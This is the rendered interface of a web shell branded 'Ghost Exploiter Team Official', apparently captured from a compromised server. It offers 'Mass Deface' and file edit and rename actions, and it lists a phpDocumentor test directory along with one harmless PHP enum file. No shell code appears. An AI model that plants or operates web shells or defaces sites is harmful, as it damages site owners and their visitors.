Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
phpdocumentor
/
reflection
/
tests
/
integration
/
data
/
Enums
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
EnumConsumer.php
0.229KB
edt
ren
backedEnum.php
0.156KB
edt
ren
base.php
0.104KB
edt
ren
enumWithConstant.php
0.157KB
edt
ren
<?php declare(strict_types=1); namespace MyNamespace; enum MyEnum { case VALUE1; case VALUE2; }